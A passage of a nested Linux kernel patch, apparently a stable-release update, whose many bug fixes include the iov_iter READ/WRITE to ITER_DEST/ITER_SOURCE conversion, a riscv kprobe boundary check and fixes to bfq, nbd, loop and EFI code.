++			regs->iaoq[num - RI(iaoq[0])] = val | PRIV_USER;
+ 			return;
+ 	case RI(sar):	regs->sar = val;
+ 			return;
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index 77fa88c2aed0d..0b7d01d408ac8 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -192,7 +192,7 @@ static inline void arch_local_irq_enable(void)
+ 
+ static inline unsigned long arch_local_irq_save(void)
+ {
+-	return irq_soft_mask_set_return(IRQS_DISABLED);
++	return irq_soft_mask_or_return(IRQS_DISABLED);
+ }
+ 
+ static inline bool arch_irqs_disabled_flags(unsigned long flags)
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index cac727b017999..5a2384ed17279 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -262,6 +262,17 @@ print_mapping(unsigned long start, unsigned long end, unsigned long size, bool e
+ static unsigned long next_boundary(unsigned long addr, unsigned long end)
+ {
+ #ifdef CONFIG_STRICT_KERNEL_RWX
++	unsigned long stext_phys;
++
++	stext_phys = __pa_symbol(_stext);
++
++	// Relocatable kernel running at non-zero real address
++	if (stext_phys != 0) {
++		// Start of relocated kernel text is a rodata boundary
++		if (addr < stext_phys)
++			return stext_phys;
++	}
++
+ 	if (addr < __pa_symbol(__srwx_boundary))
+ 		return __pa_symbol(__srwx_boundary);
+ #endif
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index 100e97daf76ba..9d229ef7f86ef 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -22,7 +22,7 @@
+  * Used to avoid races in counting the nest-pmu units during hotplug
+  * register and unregister
+  */
+-static DEFINE_SPINLOCK(nest_init_lock);
++static DEFINE_MUTEX(nest_init_lock);
+ static DEFINE_PER_CPU(struct imc_pmu_ref *, local_nest_imc_refc);
+ static struct imc_pmu **per_nest_pmu_arr;
+ static cpumask_t nest_imc_cpumask;
+@@ -1629,7 +1629,7 @@ static void imc_common_mem_free(struct imc_pmu *pmu_ptr)
+ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ {
+ 	if (pmu_ptr->domain == IMC_DOMAIN_NEST) {
+-		spin_lock(&nest_init_lock);
++		mutex_lock(&nest_init_lock);
+ 		if (nest_pmus == 1) {
+ 			cpuhp_remove_state(CPUHP_AP_PERF_POWERPC_NEST_IMC_ONLINE);
+ 			kfree(nest_imc_refc);
+@@ -1639,7 +1639,7 @@ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ 
+ 		if (nest_pmus > 0)
+ 			nest_pmus--;
+-		spin_unlock(&nest_init_lock);
++		mutex_unlock(&nest_init_lock);
+ 	}
+ 
+ 	/* Free core_imc memory */
+@@ -1796,11 +1796,11 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 		* rest. To handle the cpuhotplug callback unregister, we track
+ 		* the number of nest pmus in "nest_pmus".
+ 		*/
+-		spin_lock(&nest_init_lock);
++		mutex_lock(&nest_init_lock);
+ 		if (nest_pmus == 0) {
+ 			ret = init_nest_pmu_ref();
+ 			if (ret) {
+-				spin_unlock(&nest_init_lock);
++				mutex_unlock(&nest_init_lock);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+ 				goto err_free_mem;
+@@ -1808,7 +1808,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			/* Register for cpu hotplug notification. */
+ 			ret = nest_pmu_cpumask_init();
+ 			if (ret) {
+-				spin_unlock(&nest_init_lock);
++				mutex_unlock(&nest_init_lock);
+ 				kfree(nest_imc_refc);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+@@ -1816,7 +1816,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			}
+ 		}
+ 		nest_pmus++;
+-		spin_unlock(&nest_init_lock);
++		mutex_unlock(&nest_init_lock);
+ 		break;
+ 	case IMC_DOMAIN_CORE:
+ 		ret = core_imc_pmu_cpumask_init();
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 0d13b597cb55f..c8187867c5f47 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -80,6 +80,9 @@ ifeq ($(CONFIG_PERF_EVENTS),y)
+         KBUILD_CFLAGS += -fno-omit-frame-pointer
+ endif
+ 
++# Avoid generating .eh_frame sections.
++KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/kernel/probes/kprobes.c b/arch/riscv/kernel/probes/kprobes.c
+index e6e950b7cf327..388ecada500c1 100644
+--- a/arch/riscv/kernel/probes/kprobes.c
++++ b/arch/riscv/kernel/probes/kprobes.c
+@@ -48,6 +48,21 @@ static void __kprobes arch_simulate_insn(struct kprobe *p, struct pt_regs *regs)
+ 	post_kprobe_handler(p, kcb, regs);
+ }
+ 
++static bool __kprobes arch_check_kprobe(struct kprobe *p)
++{
++	unsigned long tmp  = (unsigned long)p->addr - p->offset;
++	unsigned long addr = (unsigned long)p->addr;
++
++	while (tmp <= addr) {
++		if (tmp == addr)
++			return true;
++
++		tmp += GET_INSN_LENGTH(*(u16 *)tmp);
++	}
++
++	return false;
++}
++
+ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ {
+ 	unsigned long probe_addr = (unsigned long)p->addr;
+@@ -55,6 +70,9 @@ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ 	if (probe_addr & 0x1)
+ 		return -EILSEQ;
+ 
++	if (!arch_check_kprobe(p))
++		return -EILSEQ;
++
+ 	/* copy instruction */
+ 	p->opcode = *p->addr;
+ 
+diff --git a/arch/s390/kernel/crash_dump.c b/arch/s390/kernel/crash_dump.c
+index e4ef67e4da0a8..c13b1455ec8ca 100644
+--- a/arch/s390/kernel/crash_dump.c
++++ b/arch/s390/kernel/crash_dump.c
+@@ -153,7 +153,7 @@ int copy_oldmem_kernel(void *dst, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dst;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 	if (copy_oldmem_iter(&iter, src, count) < count)
+ 		return -EFAULT;
+ 	return 0;
+diff --git a/arch/s390/mm/maccess.c b/arch/s390/mm/maccess.c
+index 1571cdcb0c50c..4824d1cd33d87 100644
+--- a/arch/s390/mm/maccess.c
++++ b/arch/s390/mm/maccess.c
+@@ -128,7 +128,7 @@ int memcpy_real(void *dest, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dest;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 	if (memcpy_real_iter(&iter, src, count) < count)
+ 		return -EFAULT;
+ 	return 0;
+diff --git a/arch/x86/Makefile b/arch/x86/Makefile
+index 415a5d138de47..3419ffa2a3507 100644
+--- a/arch/x86/Makefile
++++ b/arch/x86/Makefile
+@@ -14,13 +14,13 @@ endif
+ 
+ ifdef CONFIG_CC_IS_GCC
+ RETPOLINE_CFLAGS	:= $(call cc-option,-mindirect-branch=thunk-extern -mindirect-branch-register)
+-RETPOLINE_CFLAGS	+= $(call cc-option,-mindirect-branch-cs-prefix)
+ RETPOLINE_VDSO_CFLAGS	:= $(call cc-option,-mindirect-branch=thunk-inline -mindirect-branch-register)
+ endif
+ ifdef CONFIG_CC_IS_CLANG
+ RETPOLINE_CFLAGS	:= -mretpoline-external-thunk
+ RETPOLINE_VDSO_CFLAGS	:= -mretpoline
+ endif
++RETPOLINE_CFLAGS	+= $(call cc-option,-mindirect-branch-cs-prefix)
+ 
+ ifdef CONFIG_RETHUNK
+ RETHUNK_CFLAGS		:= -mfunction-return=thunk-extern
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 1b92bf05fd652..5a1d0ea402e41 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -6342,6 +6342,7 @@ __init int intel_pmu_init(void)
+ 		break;
+ 
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 		pmem = true;
+ 		x86_pmu.late_ack = true;
+ 		memcpy(hw_cache_event_ids, spr_hw_cache_event_ids, sizeof(hw_cache_event_ids));
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index 3019fb1926e35..551741e79e038 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -677,6 +677,7 @@ static const struct x86_cpu_id intel_cstates_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,		&icx_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_D,		&icx_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&icx_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&icx_cstates),
+ 
+ 	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L,		&icl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE,		&icl_cstates),
+diff --git a/arch/x86/include/asm/debugreg.h b/arch/x86/include/asm/debugreg.h
+index cfdf307ddc012..9ed8343c9b3cb 100644
+--- a/arch/x86/include/asm/debugreg.h
++++ b/arch/x86/include/asm/debugreg.h
+@@ -39,7 +39,20 @@ static __always_inline unsigned long native_get_debugreg(int regno)
+ 		asm("mov %%db6, %0" :"=r" (val));
+ 		break;
+ 	case 7:
+-		asm("mov %%db7, %0" :"=r" (val));
++		/*
++		 * Apply __FORCE_ORDER to DR7 reads to forbid re-ordering them
++		 * with other code.
++		 *
++		 * This is needed because a DR7 access can cause a #VC exception
++		 * when running under SEV-ES. Taking a #VC exception is not a
++		 * safe thing to do just anywhere in the entry code and
++		 * re-ordering might place the access into an unsafe location.
++		 *
++		 * This happened in the NMI handler, where the DR7 read was
++		 * re-ordered to happen before the call to sev_es_ist_enter(),
++		 * causing stack recursion.
++		 */
++		asm volatile("mov %%db7, %0" : "=r" (val) : __FORCE_ORDER);
+ 		break;
+ 	default:
+ 		BUG();
+@@ -66,7 +79,16 @@ static __always_inline void native_set_debugreg(int regno, unsigned long value)
+ 		asm("mov %0, %%db6"	::"r" (value));
+ 		break;
+ 	case 7:
+-		asm("mov %0, %%db7"	::"r" (value));
++		/*
++		 * Apply __FORCE_ORDER to DR7 writes to forbid re-ordering them
++		 * with other code.
++		 *
++		 * While is didn't happen with a DR7 write (see the DR7 read
++		 * comment above which explains where it happened), add the
++		 * __FORCE_ORDER here too to avoid similar problems in the
++		 * future.
++		 */
++		asm volatile("mov %0, %%db7"	::"r" (value), __FORCE_ORDER);
+ 		break;
+ 	default:
+ 		BUG();
+diff --git a/arch/x86/kernel/cpu/aperfmperf.c b/arch/x86/kernel/cpu/aperfmperf.c
+index 1f60a2b279368..fdbb5f07448fa 100644
+--- a/arch/x86/kernel/cpu/aperfmperf.c
++++ b/arch/x86/kernel/cpu/aperfmperf.c
+@@ -330,7 +330,16 @@ static void __init bp_init_freq_invariance(void)
+ 
+ static void disable_freq_invariance_workfn(struct work_struct *work)
+ {
++	int cpu;
++
+ 	static_branch_disable(&arch_scale_freq_key);
++
++	/*
++	 * Set arch_freq_scale to a default value on all cpus
++	 * This negates the effect of scaling
++	 */
++	for_each_possible_cpu(cpu)
++		per_cpu(arch_freq_scale, cpu) = SCHED_CAPACITY_SCALE;
+ }
+ 
+ static DECLARE_WORK(disable_freq_invariance_work,
+diff --git a/arch/x86/kernel/cpu/microcode/intel.c b/arch/x86/kernel/cpu/microcode/intel.c
+index 048e38ec99e71..1def66118b03c 100644
+--- a/arch/x86/kernel/cpu/microcode/intel.c
++++ b/arch/x86/kernel/cpu/microcode/intel.c
+@@ -902,7 +902,7 @@ static enum ucode_state request_microcode_fw(int cpu, struct device *device,
+ 
+ 	kvec.iov_base = (void *)firmware->data;
+ 	kvec.iov_len = firmware->size;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, firmware->size);
++	iov_iter_kvec(&iter, ITER_SOURCE, &kvec, 1, firmware->size);
+ 	ret = generic_load_microcode(cpu, &iter);
+ 
+ 	release_firmware(firmware);
+diff --git a/arch/x86/kernel/crash_dump_64.c b/arch/x86/kernel/crash_dump_64.c
+index e75bc2f217ffe..32d710f7eb84c 100644
+--- a/arch/x86/kernel/crash_dump_64.c
++++ b/arch/x86/kernel/crash_dump_64.c
+@@ -57,7 +57,7 @@ ssize_t elfcorehdr_read(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos,
+ 				cc_platform_has(CC_ATTR_GUEST_MEM_ENCRYPT));
+diff --git a/block/bfq-cgroup.c b/block/bfq-cgroup.c
+index 7d624a3a3f0f8..60b4299bec8ec 100644
+--- a/block/bfq-cgroup.c
++++ b/block/bfq-cgroup.c
+@@ -718,15 +718,15 @@ static void *__bfq_bic_change_cgroup(struct bfq_data *bfqd,
+ 				     struct bfq_io_cq *bic,
+ 				     struct bfq_group *bfqg)
+ {
+-	struct bfq_queue *async_bfqq = bic_to_bfqq(bic, 0);
+-	struct bfq_queue *sync_bfqq = bic_to_bfqq(bic, 1);
++	struct bfq_queue *async_bfqq = bic_to_bfqq(bic, false);
++	struct bfq_queue *sync_bfqq = bic_to_bfqq(bic, true);
+ 	struct bfq_entity *entity;
+ 
+ 	if (async_bfqq) {
+ 		entity = &async_bfqq->entity;
+ 
+ 		if (entity->sched_data != &bfqg->sched_data) {
+-			bic_set_bfqq(bic, NULL, 0);
++			bic_set_bfqq(bic, NULL, false);
+ 			bfq_release_process_ref(bfqd, async_bfqq);
+ 		}
+ 	}
+@@ -761,8 +761,8 @@ static void *__bfq_bic_change_cgroup(struct bfq_data *bfqd,
+ 				 * request from the old cgroup.
+ 				 */
+ 				bfq_put_cooperator(sync_bfqq);
++				bic_set_bfqq(bic, NULL, true);
+ 				bfq_release_process_ref(bfqd, sync_bfqq);
+-				bic_set_bfqq(bic, NULL, 1);
+ 			}
+ 		}
+ 	}
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 7b894df32e320..ff9d238894157 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -3180,7 +3180,7 @@ bfq_merge_bfqqs(struct bfq_data *bfqd, struct bfq_io_cq *bic,
+ 	/*
+ 	 * Merge queues (that is, let bic redirect its requests to new_bfqq)
+ 	 */
+-	bic_set_bfqq(bic, new_bfqq, 1);
++	bic_set_bfqq(bic, new_bfqq, true);
+ 	bfq_mark_bfqq_coop(new_bfqq);
+ 	/*
+ 	 * new_bfqq now belongs to at least two bics (it is a shared queue):
+@@ -5491,9 +5491,11 @@ static void bfq_check_ioprio_change(struct bfq_io_cq *bic, struct bio *bio)
+ 
+ 	bfqq = bic_to_bfqq(bic, false);
+ 	if (bfqq) {
+-		bfq_release_process_ref(bfqd, bfqq);
++		struct bfq_queue *old_bfqq = bfqq;
++
+ 		bfqq = bfq_get_queue(bfqd, bio, false, bic, true);
+ 		bic_set_bfqq(bic, bfqq, false);
++		bfq_release_process_ref(bfqd, old_bfqq);
+ 	}
+ 
+ 	bfqq = bic_to_bfqq(bic, true);
+@@ -6627,7 +6629,7 @@ bfq_split_bfqq(struct bfq_io_cq *bic, struct bfq_queue *bfqq)
+ 		return bfqq;
+ 	}
+ 
+-	bic_set_bfqq(bic, NULL, 1);
++	bic_set_bfqq(bic, NULL, true);
+ 
+ 	bfq_put_cooperator(bfqq);
+ 
+diff --git a/certs/Makefile b/certs/Makefile
+index 9486ed924731b..799ad7b9e68a0 100644
+--- a/certs/Makefile
++++ b/certs/Makefile
+@@ -23,8 +23,8 @@ $(obj)/blacklist_hash_list: $(CONFIG_SYSTEM_BLACKLIST_HASH_LIST) FORCE
+ targets += blacklist_hash_list
+ 
+ quiet_cmd_extract_certs  = CERT    $@
+-      cmd_extract_certs  = $(obj)/extract-cert $(extract-cert-in) $@
+-extract-cert-in = $(or $(filter-out $(obj)/extract-cert, $(real-prereqs)),"")
++      cmd_extract_certs  = $(obj)/extract-cert "$(extract-cert-in)" $@
++extract-cert-in = $(filter-out $(obj)/extract-cert, $(real-prereqs))
+ 
+ $(obj)/system_certificates.o: $(obj)/x509_certificate_list
+ 
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index bcd059caa1c81..814d2dc87d7e8 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -766,7 +766,7 @@ static int build_cipher_test_sglists(struct cipher_test_sglists *tsgls,
+ 	struct iov_iter input;
+ 	int err;
+ 
+-	iov_iter_kvec(&input, WRITE, inputs, nr_inputs, src_total_len);
++	iov_iter_kvec(&input, ITER_SOURCE, inputs, nr_inputs, src_total_len);
+ 	err = build_test_sglist(&tsgls->src, cfg->src_divs, alignmask,
+ 				cfg->inplace_mode != OUT_OF_PLACE ?
+ 					max(dst_total_len, src_total_len) :
+@@ -1180,7 +1180,7 @@ static int build_hash_sglist(struct test_sglist *tsgl,
+ 
+ 	kv.iov_base = (void *)vec->plaintext;
+ 	kv.iov_len = vec->psize;
+-	iov_iter_kvec(&input, WRITE, &kv, 1, vec->psize);
++	iov_iter_kvec(&input, ITER_SOURCE, &kv, 1, vec->psize);
+ 	return build_test_sglist(tsgl, cfg->src_divs, alignmask, vec->psize,
+ 				 &input, divs);
+ }
+diff --git a/drivers/acpi/pfr_update.c b/drivers/acpi/pfr_update.c
+index 9d2bdc13253a5..98267f163e2bd 100644
+--- a/drivers/acpi/pfr_update.c
++++ b/drivers/acpi/pfr_update.c
+@@ -455,7 +455,7 @@ static ssize_t pfru_write(struct file *file, const char __user *buf,
+ 
+ 	iov.iov_base = (void __user *)buf;
+ 	iov.iov_len = len;
+-	iov_iter_init(&iter, WRITE, &iov, 1, len);
++	iov_iter_init(&iter, ITER_SOURCE, &iov, 1, len);
+ 
+ 	/* map the communication buffer */
+ 	phy_addr = (phys_addr_t)((buf_info.addr_hi << 32) | buf_info.addr_lo);
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index d3ce5c383f3a7..26a75f5cce95b 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -3108,7 +3108,7 @@ int sata_down_spd_limit(struct ata_link *link, u32 spd_limit)
+ 	 */
+ 	if (spd > 1)
+ 		mask &= (1 << (spd - 1)) - 1;
+-	else
++	else if (link->sata_spd)
+ 		return -EINVAL;
+ 
+ 	/* were we already at the bottom? */
+diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
+index 6772402326842..590d1b50ab5d6 100644
+--- a/drivers/block/drbd/drbd_main.c
++++ b/drivers/block/drbd/drbd_main.c
+@@ -1816,7 +1816,7 @@ int drbd_send(struct drbd_connection *connection, struct socket *sock,
+ 
+ 	/* THINK  if (signal_pending) return ... ? */
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iov, 1, size);
+ 
+ 	if (sock == connection->data.socket) {
+ 		rcu_read_lock();
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index ee69d50ba4fd3..54010eac6ca91 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -507,7 +507,7 @@ static int drbd_recv_short(struct socket *sock, void *buf, size_t size, int flag
+ 	struct msghdr msg = {
+ 		.msg_flags = (flags ? flags : MSG_WAITALL | MSG_NOSIGNAL)
+ 	};
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, size);
+ 	return sock_recvmsg(sock, &msg, msg.msg_flags);
+ }
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index d12d3d171ec4c..df628e30bca41 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -243,7 +243,7 @@ static int lo_write_bvec(struct file *file, struct bio_vec *bvec, loff_t *ppos)
+ 	struct iov_iter i;
+ 	ssize_t bw;
+ 
+-	iov_iter_bvec(&i, WRITE, bvec, 1, bvec->bv_len);
++	iov_iter_bvec(&i, ITER_SOURCE, bvec, 1, bvec->bv_len);
+ 
+ 	file_start_write(file);
+ 	bw = vfs_iter_write(file, &i, ppos, 0);
+@@ -286,7 +286,7 @@ static int lo_read_simple(struct loop_device *lo, struct request *rq,
+ 	ssize_t len;
+ 
+ 	rq_for_each_segment(bvec, rq, iter) {
+-		iov_iter_bvec(&i, READ, &bvec, 1, bvec.bv_len);
++		iov_iter_bvec(&i, ITER_DEST, &bvec, 1, bvec.bv_len);
+ 		len = vfs_iter_read(lo->lo_backing_file, &i, &pos, 0);
+ 		if (len < 0)
+ 			return len;
+@@ -392,7 +392,7 @@ static void lo_rw_aio_complete(struct kiocb *iocb, long ret)
+ }
+ 
+ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
+-		     loff_t pos, bool rw)
++		     loff_t pos, int rw)
+ {
+ 	struct iov_iter iter;
+ 	struct req_iterator rq_iter;
+@@ -448,7 +448,7 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
+ 	cmd->iocb.ki_flags = IOCB_DIRECT;
+ 	cmd->iocb.ki_ioprio = IOPRIO_PRIO_VALUE(IOPRIO_CLASS_NONE, 0);
+ 
+-	if (rw == WRITE)
++	if (rw == ITER_SOURCE)
+ 		ret = call_write_iter(file, &cmd->iocb, &iter);
+ 	else
+ 		ret = call_read_iter(file, &cmd->iocb, &iter);
+@@ -490,12 +490,12 @@ static int do_req_filebacked(struct loop_device *lo, struct request *rq)
+ 		return lo_fallocate(lo, rq, pos, FALLOC_FL_PUNCH_HOLE);
+ 	case REQ_OP_WRITE:
+ 		if (cmd->use_aio)
+-			return lo_rw_aio(lo, cmd, pos, WRITE);
++			return lo_rw_aio(lo, cmd, pos, ITER_SOURCE);
+ 		else
+ 			return lo_write_simple(lo, rq, pos);
+ 	case REQ_OP_READ:
+ 		if (cmd->use_aio)
+-			return lo_rw_aio(lo, cmd, pos, READ);
++			return lo_rw_aio(lo, cmd, pos, ITER_DEST);
+ 		else
+ 			return lo_read_simple(lo, rq, pos);
+ 	default:
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 5cffd96ef2d7d..e379ccc63c520 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -563,7 +563,7 @@ static int nbd_send_cmd(struct nbd_device *nbd, struct nbd_cmd *cmd, int index)
+ 	u32 nbd_cmd_flags = 0;
+ 	int sent = nsock->sent, skip = 0;
+ 
+-	iov_iter_kvec(&from, WRITE, &iov, 1, sizeof(request));
++	iov_iter_kvec(&from, ITER_SOURCE, &iov, 1, sizeof(request));
+ 
+ 	type = req_to_nbd_cmd_type(req);
+ 	if (type == U32_MAX)
+@@ -649,7 +649,7 @@ send_pages:
+ 
+ 			dev_dbg(nbd_to_dev(nbd), "request %p: sending %d bytes data\n",
+ 				req, bvec.bv_len);
+-			iov_iter_bvec(&from, WRITE, &bvec, 1, bvec.bv_len);
++			iov_iter_bvec(&from, ITER_SOURCE, &bvec, 1, bvec.bv_len);
+ 			if (skip) {
+ 				if (skip >= iov_iter_count(&from)) {
+ 					skip -= iov_iter_count(&from);
+@@ -701,7 +701,7 @@ static int nbd_read_reply(struct nbd_device *nbd, int index,
+ 	int result;
+ 
+ 	reply->magic = 0;
+-	iov_iter_kvec(&to, READ, &iov, 1, sizeof(*reply));
++	iov_iter_kvec(&to, ITER_DEST, &iov, 1, sizeof(*reply));
+ 	result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
+ 	if (result < 0) {
+ 		if (!nbd_disconnected(nbd->config))
+@@ -790,7 +790,7 @@ static struct nbd_cmd *nbd_handle_reply(struct nbd_device *nbd, int index,
+ 		struct iov_iter to;
+ 
+ 		rq_for_each_segment(bvec, req, iter) {
+-			iov_iter_bvec(&to, READ, &bvec, 1, bvec.bv_len);
++			iov_iter_bvec(&to, ITER_DEST, &bvec, 1, bvec.bv_len);
+ 			result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
+ 			if (result < 0) {
+ 				dev_err(disk_to_dev(nbd->disk), "Receive data failed (result %d)\n",
+@@ -1267,7 +1267,7 @@ static void send_disconnects(struct nbd_device *nbd)
+ 	for (i = 0; i < config->num_connections; i++) {
+ 		struct nbd_sock *nsock = config->socks[i];
+ 
+-		iov_iter_kvec(&from, WRITE, &iov, 1, sizeof(request));
++		iov_iter_kvec(&from, ITER_SOURCE, &iov, 1, sizeof(request));
+ 		mutex_lock(&nsock->tx_lock);
+ 		ret = sock_xmit(nbd, i, 1, &from, 0, NULL);
+ 		if (ret < 0)
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index e546932046309..6368b56eacf11 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -137,7 +137,7 @@ struct ublk_device {
+ 
+ 	char	*__queues;
+ 
+-	unsigned short  queue_size;
++	unsigned int	queue_size;
+ 	struct ublksrv_ctrl_dev_info	dev_info;
+ 
+ 	struct blk_mq_tag_set	tag_set;
+diff --git a/drivers/bus/sunxi-rsb.c b/drivers/bus/sunxi-rsb.c
+index 3aa91aed3bf73..226e87b85116e 100644
+--- a/drivers/bus/sunxi-rsb.c
++++ b/drivers/bus/sunxi-rsb.c
+@@ -857,7 +857,13 @@ static int __init sunxi_rsb_init(void)
+ 		return ret;
+ 	}
+ 
+-	return platform_driver_register(&sunxi_rsb_driver);
++	ret = platform_driver_register(&sunxi_rsb_driver);
++	if (ret) {
++		bus_unregister(&sunxi_rsb_bus);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(sunxi_rsb_init);
+ 
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index f5868dddbb618..5d1c8e1c99b5b 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -1329,7 +1329,7 @@ SYSCALL_DEFINE3(getrandom, char __user *, ubuf, size_t, len, unsigned int, flags
+ 			return ret;
+ 	}
+ 
+-	ret = import_single_range(READ, ubuf, len, &iov, &iter);
++	ret = import_single_range(ITER_DEST, ubuf, len, &iov, &iter);
+ 	if (unlikely(ret))
+ 		return ret;
+ 	return get_random_bytes_user(&iter);
+@@ -1447,7 +1447,7 @@ static long random_ioctl(struct file *f, unsigned int cmd, unsigned long arg)
+ 			return -EINVAL;
+ 		if (get_user(len, p++))
+ 			return -EFAULT;
+-		ret = import_single_range(WRITE, p, len, &iov, &iter);
++		ret = import_single_range(ITER_SOURCE, p, len, &iov, &iter);
+ 		if (unlikely(ret))
+ 			return ret;
+ 		ret = write_pool_user(&iter);
+diff --git a/drivers/dma-buf/dma-fence.c b/drivers/dma-buf/dma-fence.c
+index 406b4e26f538f..0de0482cd36e2 100644
+--- a/drivers/dma-buf/dma-fence.c
++++ b/drivers/dma-buf/dma-fence.c
+@@ -167,7 +167,7 @@ struct dma_fence *dma_fence_allocate_private_stub(void)
+ 		       0, 0);
+ 
+ 	set_bit(DMA_FENCE_FLAG_ENABLE_SIGNAL_BIT,
+-		&dma_fence_stub.flags);
++		&fence->flags);
+ 
+ 	dma_fence_signal(fence);
+ 
+diff --git a/drivers/firewire/core-cdev.c b/drivers/firewire/core-cdev.c
+index 9c89f7d53e99d..958aa4662ccb0 100644
+--- a/drivers/firewire/core-cdev.c
++++ b/drivers/firewire/core-cdev.c
+@@ -819,8 +819,10 @@ static int ioctl_send_response(struct client *client, union ioctl_arg *arg)
+ 
+ 	r = container_of(resource, struct inbound_transaction_resource,
+ 			 resource);
+-	if (is_fcp_request(r->request))
++	if (is_fcp_request(r->request)) {
++		kfree(r->data);
+ 		goto out;
++	}
+ 
+ 	if (a->length != fw_get_response_length(r->request)) {
+ 		ret = -EINVAL;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index 033aac6be7daa..b43e5e6ddaf6e 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -984,6 +984,8 @@ int __ref efi_mem_reserve_persistent(phys_addr_t addr, u64 size)
+ 	/* first try to find a slot in an existing linked list entry */
+ 	for (prsv = efi_memreserve_root->next; prsv; ) {
+ 		rsv = memremap(prsv, sizeof(*rsv), MEMREMAP_WB);
++		if (!rsv)
++			return -ENOMEM;
+ 		index = atomic_fetch_add_unless(&rsv->count, 1, rsv->size);
+ 		if (index < rsv->size) {
+ 			rsv->entry[index].base = addr;
+diff --git a/drivers/firmware/efi/memattr.c b/drivers/firmware/efi/memattr.c
